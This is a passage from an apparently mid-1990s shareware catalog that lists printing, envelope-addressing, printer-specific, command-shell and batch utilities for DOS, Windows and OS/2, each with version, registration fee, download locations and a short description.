PATRISOFT for assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + A great ASCII file printing tool providing extensive file + selection and formatting. Uses printer definition files to + support any printer. Specify print size, margins, headings, + footings, line numbering, and even data selection. Print two + pages per piece of paper on a laser printer. Scans a directory + to select multiple files to print. Set lines per page and cols + per line. Featured in Dr. File Finder's Guide to Shareware. + + + Product: Pulsar for Windows + LaserJet utility for Windows. See full description on page 87. + + 2.4.2 UPCs & bar codes + + Product: Infothek Information Manager + Information Manager, PIM, Labels Barcodes. See full + description on page 139. + + Product: PrintEnvelope + Complete mail addressing system for Windows. See full + description on page 82. + + 2.4.3 Envelope addressers + + Product: APT Mailing Assistant + Author: APT Computer Solutions, Inc., 606-873-0589 + Version: 5.30 (01-15-95) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Epson printer. + Strongly recommended: Hard disk; HP LaserJet printer. + Registration fee: $24.95 (add $3.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support; all ASP-wide offers (see page 6). CASS certified + program. + Look for: APMAD530.ZIP on BBSs (call 606-233-0154 to download it + at no charge); APMAD.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 9 (or contact userID 73023,3037 for assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Prints envelopes or labels on Lexmark/IBM or HP compatible + laser printers, deskjet, and Epson compatible dot matrix + printers. Envelopes and some labels will have USPS approved + POSTNET codes to speed delivery. Also provides easy to use bulk + mail facility with zip code statistics and the capability to + + Chapter 2, "Utilities" 81 + + + + print your bulk mail permit box if desired. Envelopes and + labels are printed in zip code sequence for easy bundling. + Multiple name and address files may be maintained to catagorize + mailing lists. + + + Product: APT Mailing Assistant (OS/2) + Author: APT Computer Solutions, Inc., 606-873-0589 + Version: 1.10 (01-15-95) + Needs: IBM 80386, OS/2 2.0 or better. Program can run safely on + a system with no hard disk and only one floppy disk drive; + Epson printer. + Strongly recommended: Hard disk; HP LaserJet printer. + Registration fee: $37.95 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, CompuServe, mail support; + 3-month return policy; all ASP-wide offers (see page 6); + discounts on other products; discounts on upgrades. 3-month + free upgrading allowed. Registered version is CASS certified + by U.S. Postal Service. + Look for: APMAO110.ZIP on BBSs (call 606-233-0154 to download it + at no charge); APMAO.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 9 (or contact userID 73023,3037 for assistance). + Download size: 130k (about ten minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Easy to use program that prints several types of envelopes and + labels with delivery point bar codes using HP compatible laser, + deskjet, or Epson compatible dot matrix printers. Can reuse + laser label sheets when printing single labels. Has bulk mail + facility that can print your bulk mail permit box, multiple + address files, and import/export facility. + + Chapter 2, "Utilities" 82 + + + + Product: FF Designer Envelopes + Author: M & R Technologies, Inc., 407-951-2268 + Version: 1.2 (12-01-94) + Needs: IBM PC, Windows 3.0 or better. VGA monitor; Hard disk; + Mouse. Printer capable of printing envelopes. + Registration fee: $19.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; bonus + utilities; bonus graphics; all ASP-wide offers (see page 6); + discounts on other products. + Look for: FFDELP.ZIP on BBSs; FFDELP.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 7 (or contact userID 72103,505 for + assistance). + Download size: 358k (about 27 minutes with a 2400 baud modem) + Description: + A graphics program which enables you to create envelopes and + letterhead stationary. Features include a drag and drop + interface, allowing you to place text, pictures, lines and + rectangles on your designs. Use all your Windows fonts and + bitmaps! Links to Cardfile for management/importing of + addresses and text. Links to Paintbrush for creating/editing + picture files. Prints many envelope sizes and scales your + layouts to fit on larger envelopes. + + + Product: PrintEnvelope + Author: Maurer Associates (T. Scott Maurer), 214-432-0700 + Version: 3.01 (05-15-95) + Needs: IBM PC, Windows 3.0 or better. EGA monitor; Hard disk; + VBRUN300.DLL. + Registration fee: $29.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; quick- + reference card; choice of 31/2" or 51/4" master disk(s); lifetime + unlimited phone, fax, CompuServe, GEnie, mail support; bonus + utilities; bonus data; discounts on upgrades. Lifetime free + upgrading allowed. + Look for: ENVEL301.ZIP on BBSs; ENVEL301.Z on CompuServe in + CIS:WINSHARE forum LIBrary 15 (or contact userID 74017,2140 for + assistance); ENVEL3.ZIP on GEnie in WINDOWS forum LIBrary 11 + (or contact userID T.MAURER for assistance). + PsL#: 10442 + Download size: 219k (about 17 minutes with a 2400 baud modem) + Description: + Any size envelopes, any size labels, on any printer! Packed + with features like: .BMP graphic return address; address import + from address book or Cardfile or dBASE, or ASCII mail list; + city/state automatically filled in when you type ZIP Code, and + auto-select orientation and paper bins. USPS approved PostNet + barcodes. + + Chapter 2, "Utilities" 83 + + + + Product: PSA Cards for Windows 3.1 + An easy to use personal information manager. See full + description on page 141. + + Product: PSA Cards for Windows 95/NT + An easy to use personal information manager. See full + description on page 142. + + Product: Public Address + Full featured address manager. See full description on + page 228. + + Product: QENV + Author: Annette Cuomo, 909-591-4956 + Version: 2.5 (08-07-94) + Needs: IBM PC, DOS 4.0 or better. + Registration fee: $15.00 + Registration benefits: 3 months of support. Master disks, + support, upgrade discounts. + Look for: QENV.ZIP on BBSs (call 714-730-6743 to download it at + no charge); QENV.ZIP on CompuServe in CIS:PCUTIL forum LIBrary + 7 (or contact userID 73747,3537 for assistance). + Download size: 110k (about eight minutes with a 2400 baud modem) + Description: + Provides an extremely easy way of printing an envelope. Just + enter the data and press a key to print. Automatically stores + the names & addresses for the envelopes printed which can then + be incorportated into the mail merge function (letter writing). + If using with a LaserJet or compatible printer the U.S. Postal + bar codes are included on the envelope. + + + Product: Winvelope + Author: Winvelope Software, 606-832-2493 + Version: 5.0 (06-04-95) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $20.00 (Canadian dollars) (add $4.00 (Canadian + dollars) for shipping to Canadian addresses) (add $4.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; 1-month limited return policy; all + ASP-wide offers (see page 6). 6-month free upgrading allowed. + Look for: WENV50.ZIP on BBSs (call 606-832-4029 to download it at + no charge); WENV50.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71620,24 for assistance). + PsL#: 10401 + Download size: 306k (about 23 minutes with a 2400 baud modem) + Description: + Envelope printing utility for Windows. Includes selectable + envelope size, fonts, return addresses, graphic logos, postnet + barcodes, automatic printer setup, and more. Address Manager + database stores address data in MS Access file format. + Attractive, user-friendly interface. BEGIN QUOTATION "This is a + + Chapter 2, "Utilities" 84 + + + + most excellent envelope printing program..." - Robert Mullen, + author, Windows 3.1 Hyperguide END QUOTATION + + + 2.4.4 Printer specific + + Product: Citizen + Author: R.K. West Consulting (Rosemary K. West) + Version: 4.0 (05-13-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. Citizen MSP or Tribute printer. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: CTZN40.ZIP on BBSs; CITZEN.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 125k (about ten minutes with a 2400 baud modem) + Description: + This menu-driven utility lets you control the fonts on your + Citizen MSP or Tribute printer. You can also print small text + files and type envelopes from the program. + + + Product: CrabWise + Author: Shawn Anderson SoftWare, 309-787-4967-(X227) + Version: 1.0 (01-01-94) + Needs: IBM PC, DOS 2.11 or better. 300k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. IBM Proprinter. + Strongly recommended: EGA monitor. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited fax, CompuServe, mail + support; royalty-free source code; royalty-free runtime + license; bonus templates; all ASP-wide offers (see page 6). + 6-month free upgrading allowed. 1 free update disk(s) sent + out. Font charts. + Look for: availability unknown on BBSs. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + A text-file landscape printer for the IBM Proprinter series. + + + 2.4.4.1 Epson + + Product: 2col + Paper-saving compressed print utility. See full description on + page 74. + + Chapter 2, "Utilities" 85 + + + + Product: DMPLAS (Dot Matrix to LaserJet) + Translate IBM/Epson FX print to HP LaserJet. See full + description on page 85. + + Product: HQ-FAX (1-Step High Quality FAX + One-step high quality FAX. See full description on page 374. + + 2.4.4.2 HP DeskJet + + Product: 2col + Paper-saving compressed print utility. See full description on + page 74. + + Product: BOOKLET + PC booklet printing utility. See full description on page 85. + + Product: JETCOL + Paper-saving compressed print utility. See full description on + page 76. + + Product: LASR_MAN + A laser/ink jet printer with many styles. See full description + on page 86. + + 2.4.4.3 HP LaserJet + + Product: BOOKLET + Author: Sympathetic Software (Stephen L Billard) + Version: 4.5 (10-02-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; HP DeskJet printer; HP LaserJet printer. + Registration fee: $20.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support. 36-month free + upgrading allowed. + Look for: availability unknown on BBSs; BOOKL*.ZIP on CompuServe + in CIS:PCHW forum LIBrary 2 (multiple files) (or contact userID + 71046,1476 for assistance). + PsL#: 10366 + Download size: 175k (about 13 minutes with a 2400 baud modem) + Description: + Creates PC booklet sized documents from full page documents. + Prints four pages of the document on each sheet of paper. The + pages are printed "half size" two pages per side of the paper + turned sideways. Handles A4, letter, legal, and exec paper. + Also prints single sided. + + Converts word processor HPPCL output to fit the reduced size. + Formatting is preserved. Extensive error recovery allows + restart after jams or other printing failures. Use menu/screen + or command line interface with online help. + + Chapter 2, "Utilities" 86 + + + + Product: DMPLAS (Dot Matrix to LaserJet) + Author: Software Co-op, 317-856-6052 + Version: 1.1 (11-15-91) + Needs: IBM PC, DOS 2.0 or better. 6k RAM. + Registration fee: $32.00 + Registration benefits: Printed manual, master disks, phone/BBS/ + mail support. + Look for: DMPLAS??.ZIP on BBSs (multiple files) (call + 715-652-2758 to download it at no charge); DMPLS*.ZIP on + CompuServe in CIS:PCHW forum LIBrary 2 (multiple files) (or + contact userID 76635,1670 for assistance). + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + Small TSR (6k) captures and translates IBM/Epson FX output for + the HP LaserJet. Works with both text and graphics programs + (including GRAPHICS.COM). Uses native LaserJet (or compatible) + fonts or your softfonts. Optional Courier italic and + proportional fonts are also included. Prints at accurate scale + (for filling in forms) or slightly reduced vertical spacing to + print 66 lines per page. Graphics can also be compressed to fit + on the LaserJet's 10" page. + + + Product: GridForm + Prints custom graph paper on LaserJets. See full description + on page 76. + + Product: JETCOL + Paper-saving compressed print utility. See full description on + page 76. + + Product: LASR_MAN + Author: MicroMetric (David Groome), 813-377-2515 + Version: 6.05 (10-31-94) + Needs: IBM PC, DOS 3.0 or better. HP DeskJet printer; HP + LaserJet printer. HP DeskJet/LaserJet or compatable. + Strongly recommended: Hard disk. + Registration fee: $40.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: LMAN605A.ZIP on BBSs (multiple files) (call + 813-371-2490 to download it at no charge); LASMAN.ZIP on + CompuServe in CIS:PCHW forum LIBrary 2 (or contact userID + 71631,744 for assistance). + Download size: 316k (about 24 minutes with a 2400 baud modem) + Description: + Laser printer utility for ASCII files with hundreds of styles - + great for program manuals and listings, draft documents, wide + spreadsheets, database and address listings, legal documents. + Styles include: portrait/landscape orientation with any of 5 + + Chapter 2, "Utilities" 87 + + + + fonts of 10-32 characters/inch printing on one or both sides of + each sheet; multiple text pages/sheet - 2 to 200; booklets with + 1-75 files each. Many options: border/text page dividers, + custom covers, header/footers, letter/legal/A4/exec paper, + more++. + + + Product: Pulsar for Windows + Author: Tesserax Information Systems, 714.841.0616 + Version: 3.1b (03-16-95) + Needs: IBM AT (80286), Windows 3.0 or better. EGA monitor; HP + LaserJet printer; Mouse. VBRUN300.DLL. + Strongly recommended: VGA monitor; Hard disk; Plotter. + Registration fee: $35.00 (add $1.75 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 6); discounts on + upgrades. 6-month free upgrading allowed. + Look for: availability unknown on BBSs; PULSAR.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 6 (or contact userID 72247,1463 + for assistance). + SWREG#: 1205 + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + A full-featured Windows printer management program which allows + switching between PostScript & PCL modes on HP and compatible + printers. Virtually every possible printer feature can be + accessed through either the program's pull-down menus or quick- + access command buttons. + + + Product: QFont + Author: Jamestown Software, 608-271-2090 + Version: 1.5 (10-20-90) + Needs: IBM AT (80286), DOS 2.1 or better. Hercules or EGA + monitor. Mouse. + Registration fee: $80.00 + Registration benefits: Printed manual and disk; phone/BBS/ + newsletter support. + Look for: QFONT*.* on BBSs (call 608-271-3685 to download it at + no charge); QFONT.* on CompuServe in CIS:PCUTIL forum LIBrary 7 + (or contact userID 74275,745 for assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Graphic "paint" program to edit and create HP Laserjet + downloadable soft fonts. Has complete editing functions - cut + and paste, circle, curves, arcs, lines, rectangles, fills and + so on - plus powerful transformation functions such as shadow, + outline, bolden, lighten, slant and resize. Modify font + headers. Test spacing. Download fonts with sample printouts. + Change mono spaced fonts to proportional and vice versa. Use + + Chapter 2, "Utilities" 88 + + + + fonts in DTP programs like Ventura, or wordprocessors such as + WordPerfect. + + + 2.4.4.4 PostScript + + Product: Over_LAZ PS + Author: Herne Data Systems Ltd, 519-366-2732 + Version: 3 (01-15-93) + Needs: IBM PC, DOS 2.0 or better. Postscript printer. + WordPerfect 5.x, WordStar, PC-Write, dBase. + Registration fee: $25.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of support; bonus templates. + Look for: availability unknown on BBSs; OVERPS.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 2 (or contact userID 72060,1153 for + assistance); OVERPS.ZIP on GEnie in IBMPC forum LIBrary 0 (or + contact userID MIKLOS.G for assistance). + Download size: 117k (about nine minutes with a 2400 baud modem) + Description: + A collection of over 75 printer overlay files for WordPerfect + 5.0 or later, WordStar, PC-Write, dBase and other applications + and a PostScript compatible printer. Over_LAZ are provided for + standard office forms (inter office memo, FAX transmittal, etc) + as well as rubber stamps (draft, confidential, etc) and + decorative page borders. Over_LAZ PS are automatically printed + on the page over your document. + + + 2.5 System utilities + + 2.5.1 Operating systems + + See also: Utilities, Software tools & add-ins, For operating + systems. + + Product: DAZZLE + EGA/VGA super-kaleidoscope, image generator. See full + description on page 488. + + Chapter 2, "Utilities" 89 + + + + Product: System Monitor + Author: Rosenthal Engineering (Doren Rosenthal), 805-541-0910 + Version: 3.0 (10-24-93) + Needs: IBM PC, DOS 3.1 or better. 64k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $49.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: SYSMON30.ZIP on BBSs (multiple files) (call + 805-258-6172 to download it at no charge). + Download size: 53k (about four minutes with a 2400 baud modem) + Description: + Monitors and reports problems early, maintains performance, + resolves hardware/software and MS-Windows conflicts. Strong + virus defense, with support for single and LAN users. Each time + the computer s used, it re-evaluates the system by testing and + extensively monitoring a number of performance and security + indicators. Computer consultants and service organizations can + include an optional message to advertise and promote their + support services. + + + 2.5.1.1 Task-switching + + Product: LegRoom + Author: Ivden Technologies, Inc., 610-328-1145 + Version: 3.0 (02-06-95) + Needs: IBM PC, DOS 2.0 or better. 1k RAM; CGA monitor; Hercules + monitor; Dual 720k floppy drives. + Strongly recommended: Hard disk; EMS memory; XMS memory. + Registration fee: $35.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 3-month return policy; all ASP-wide offers (see + page 6). 1 free update disk(s) sent out. + Look for: LGROOM30.ZIP on BBSs (call 215-322-5114 to download it + at no charge); LGROOM.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 3 (or contact userID 71221,3602 for assistance). + SWREG#: 2833 + PsL#: 11409 + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + A TSR which lets you press a 'hot key' to shell to DOS from + virtually any application (text or graphic) and reclaim almost + all of your conventional memory for running big programs. Works + with programs that don't have a built-in DOS shell feature. + Lets you turn any program, even a batch file, into a TSR - + without any programming! Can use extended and expanded memory. + Supports concurrent users on a LAN. Create pop-up command + menus. + + Chapter 2, "Utilities" 90 + + + + 2.5.2 Multi-OS utilities + + See also: Utilities, Software tools & add-ins, For operating + systems. + + Product: 4FILES + File manager, annotator and program launcher. See full + description on page 24. + + Product: ABcmd + Author: Abri Technologies, Inc. + Version: 1.0 (03-15-94) + Needs: IBM 80386, Windows 3.1 or better. 35k RAM. + Registration fee: $15.00 (add $1.00 for shipping to U.S. + addresses) (add $1.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, mail + support; discounts on upgrades; registration commissions. + Look for: availability unknown on BBSs; ABCMD.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 4 (or contact userID 72345,1623 for + assistance). + Download size: 20k (about two minutes with a 2400 baud modem) + Description: + A real handy Windows command line with up front, intuitive, + easy-to-use controls. Features history, common dos commands, + multiple commands per line, 10 memory buttons for command line + storage, alarm function for time/date reminders or program + execution. Compact, all-in-one, 35k size doesn't clutter up + disk. + + + Product: Bootit + Author: TeraByte Unlimited + Version: 1.02 (09-03-95) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; Hard + disk. + Registration fee: $17.95 (add $9.95 for shipping to Canadian + addresses) (add $9.95 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, CompuServe, mail support; bonus + utilities; discounts on upgrades. 2-month free upgrading + allowed. + Look for: availability unknown on BBSs; BOOTIT.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 3 (or contact userID 70751,3507 for + assistance). + SWREG#: 5923 + Download size: 107k (about eight minutes with a 2400 baud modem) + Description: + Lets you have up to ten "master" partitions per hard drive, + instead of the standard four. This allows you to install + multiple operating systems in their own file systems and easily + select which one you want to boot. Also allows you to "fill" + + Chapter 2, "Utilities" 91 + + + + the standard partition table (the one that only allows four + partitions) with up to three of your choice; for example, you + could boot Windows NT and have two DOS partitions. You can also + enter hard drive specifications to override the BIOS and/or + swap drives. + + + Product: JRchive + Royalty-free file compression/archiving util. See full + description on page 37. + + Product: PocketD Plus + Award-winning 220+ option DOS army knife. See full description + on page 156. + + Product: Technical Editor (Windows NT) + Programmers/text editor. See full description on page 180. + + 2.5.3 Command processors + + Product: 4DOS + Author: JP Software Inc., 617-646-3975 + Version: 5.0 (11-23-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Strongly recommended: Hard disk. + Registration fee: $69.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, BBS, CompuServe, newsletter, mail + support; 3-month return policy; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products; + discounts on upgrades. + Look for: 4DOS*.ZIP on BBSs (multiple files) (call 617-354-7077 + to download it at no charge); 4DOS*.ZIP on CompuServe in + CIS:PCVENB forum LIBrary 10 (multiple files) (or contact userID + 75020,244 for assistance). + Download size: 640k (about 48 minutes with a 2400 baud modem) + Awards & nominations: 1989 finalist, PC Magazine Technical + Excellence Awards. 1994 winner, PC Magazine/Ziff-Davis + Interactive Shareware Awards. 1992 winner, Shareware Industry + Awards. 1989 winner, Public Brand Software contests for useful + programs. + Description: + The first utility to combine the power of the command line with + the pleasure of an easy to use interface. Enhances the + commands you're used to working with and then adds over 50 new + commands. It offers the power and flexibility you need, so + that you'll actually prefer the command line for certain tasks. + Because it only replaces COMMAND.COM, the rest of your software + works just as it always has. Try it and find out why users + love this refreshing, innovative command processor! + + Chapter 2, "Utilities" 92 + + + + Product: 4DOS for Windows NT + Author: JP Software Inc., 617-646-3975 + Version: 2.0 (01-24-94) + Needs: IBM 80386, Windows NT 3.1 or better. + Registration fee: $79.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + fax, BBS, CompuServe, newsletter, mail support; 3-month return + policy; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products; discounts on upgrades. + Look for: 4NTX.ZIP on BBSs (multiple files) (call 617-354-7077 to + download it at no charge); 4NT*.ZIP on CompuServe in CIS:PCVENB + forum LIBrary 10 (multiple files) (or contact userID 75020,244 + for assistance). + Download size: 640k (about 48 minutes with a 2400 baud modem) + Description: + The first utility to combine the power of the command line with + the pleasure of an easy to use interface. It is a refreshing + replacement for the Windows NT command shell, CMD.EXE. Enhances + most Windows NT commands, and adds over 50 of its own. It + supports all disk formats, including FAT, HPFS, and NTFS. It's + fully compatible with traditional commands, so there isn't a + new language to learn. If you've ever been frustrated by the + limitations of the command line, try this. + + + Product: 4OS2 + Author: JP Software Inc., 617-646-3975 + Version: 2.0 (12-16-93) + Needs: IBM AT (80286), OS/2 1.0 or better. + Registration fee: $69.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, BBS, CompuServe, newsletter, mail + support; 3-month return policy; disks of other shareware; + discounts on other products; discounts on upgrades. + Look for: 4OS2X.ZIP on BBSs (multiple files) (call 617-354-7077 + to download it at no charge); 4OS2*.ZIP on CompuServe in + CIS:PCVENB forum LIBrary 10 (multiple files) (or contact userID + 75020,244 for assistance). + Download size: 640k (about 48 minutes with a 2400 baud modem) + Description: + The first utility to combine the power of the command line with + the pleasure of an easy to use interface. An innovative + replacement for the OS/2 command shell CMD.EXE, it enhances + most commands and adds over 50 of its own. Commands offer you + the power and flexibility you need so you'll actually prefer + the command line for certain tasks. It supports all disk + formats, including FAT and HPFS. If you've ever been left + + Chapter 2, "Utilities" 93 + + + + frustrated by the limitations of the command line, then try + this. + + th + Product: 6 Sense - DOS 6 Utilities + Author: Tay-Jee Software Corporation (Chuck Steenburgh), + 540-464-4310 + Version: 2.21 (03-21-95) + Needs: IBM PC, DOS 5.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $14.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. Collection of DOSKEY + macros. + Look for: DOSUTL??.ZIP on BBSs; DOSUTL.ZIP on CompuServe in + CIS:PCSYS forum LIBrary 1 (or contact userID 72330,1776 for + assistance). + SWREG#: 1175 + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + Menu-driven utilities for configuring the various switches in + the new DIR and FORMAT commands. Allows you to easily select + just the options you need. You can then either execute the + command directly with the options you have specified, or store + the options in an environment variable to make the changes + permanent. Both programs feature context-sensitive help and + complete access to all documented (and some undocumented) + command features. + + + Product: ABmenu + Fast/easy, program menu and directory changer. See full + description on page 158. + + Product: FCV + View files/command output + hex/text search. See full + description on page 48. + + Product: HDM - Hard Disk Menu + DOS menu & security system, network support. See full + description on page 151. + + Product: Keyboard Express + Windows Keyboard Macro. See full description on page 97. + + Product: PocketD Plus + Award-winning 220+ option DOS army knife. See full description + on page 156. + + Chapter 2, "Utilities" 94 + + + + Product: SmilerShell + Windows cmdline, control center, launcher. See full + description on page 171. + + Product: WinKillr + Author: Open Windows (Richard W. Bryant), 719-531-0403 + Version: 1.1 (10-29-95) + Needs: IBM 80386, Windows 3.1 or better. 512k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Registration fee: $14.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of + CompuServe, mail support; lifetime return policy; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: KILLR_11.ZIP on BBSs (call 703-680-9269 to download it + at no charge); KILLR.ZIP on CompuServe in CIS:WINUTIL forum + LIBrary 18 (or contact userID 75236,3243 for assistance). + Download size: 194k (about 15 minutes with a 2400 baud modem) + Description: + New!! Timed Program Terminator - Designed to "terminate" + programs at a specific time, time/date or after a specified + elapsed time. Will Save open files and "Save As" open files + that have not yet been named. Don't let that e-mail client you + forgot to "kill" at work lock you out again! + + + 2.5.4 Batch & macro utilities + th + Product: 6 Sense - DOS 6 Utilities + Handy utilities for DOS 5.00+. See full description on + page 93. + + Chapter 2, "Utilities" 95 + + + + Product: ACTION Process Automator + Author: Redei Enterprises, 310-832-6984 + Version: 1.05 (08-25-95) + Needs: IBM 80386, Windows 3.1 or better. 8000k RAM; VGA monitor; + Hard disk; VBRUN300.DLL. + Strongly recommended: SVGA monitor; Network (LAN); XMS memory; + math coprocessor. + Registration fee: $79.50 (add $5.50 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; ACT_105.ZI on CompuServe + in CIS:WINSHARE forum LIBrary 8 (or contact userID 71744,3633 + for assistance). + SWREG#: 5177 + PsL#: 14004 + Download size: 1690k (about 126 minutes with a 2400 baud modem) + Description: + Appears iconized when Windows is loaded and takes charge over + predetermined tasks, triggering them whenever they are + scheduled to occur. Just click the icon to add, delete, edit, + view or test actions. It can copy, rename, move files and + directories, start applications,play macros, zip and unzip + archives, attach servers, map drives, reboot, restart. + + + Product: A Batch View + Author: Robin R. Latham, 817-263-4056 + Version: 1.1 (09-30-93) + Needs: IBM PC, DOS 3.0 or better. 32k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, CompuServe, mail support; 3-month return + policy; all ASP-wide offers (see page 6). 24-month free + upgrading allowed. 24 free update disk(s) sent out. + Look for: ABATVIEW.ZIP on BBSs; ABTVEW.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 1 (or contact userID 72614,602 for + assistance). + Download size: 138k (about ten minutes with a 2400 baud modem) + Description: + Eight programs make up a utility set designed to enhance your + batch Files. Operates in color or monochrome text modes. A pop- + up menu program with selectable colors, shadowing, text or + ASCII code wallpapered backgrounds, 48 selections. A pop-up + message program (same options) with system info. DOS echo + replacement for color text and graphic symbols. Scrolling + messages/billboard marquee program. (multi-option) color screen + + Chapter 2, "Utilities" 96 + + + + clearing, information, system utility programs. Text file + viewer + + + Product: BATUTIL + Author: CTRLALT Associates + Version: 4.0 (12-23-91) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $43.00 + Registration benefits: Printed manual, CompuServe support. + Look for: availability unknown on BBSs; SKEY??.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 3 (or contact userID 76004,1664 for + assistance). + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + Lets you spiff up your batch files with accesss to hardware + information, display of text in color and/or large letters, pop + up menus and file lists. You can directly access the + environment and have paths up to 255 characters long. PC + Magazine called it the 'ultimate batch enhancer' and PC World + and PC Computing included it in "Best of.." articles. Has a + full fledged language with if..then, case, etc. + + + Product: ENVI_MAN + Author: MicroMetric (David Groome), 813-377-2515 + Version: 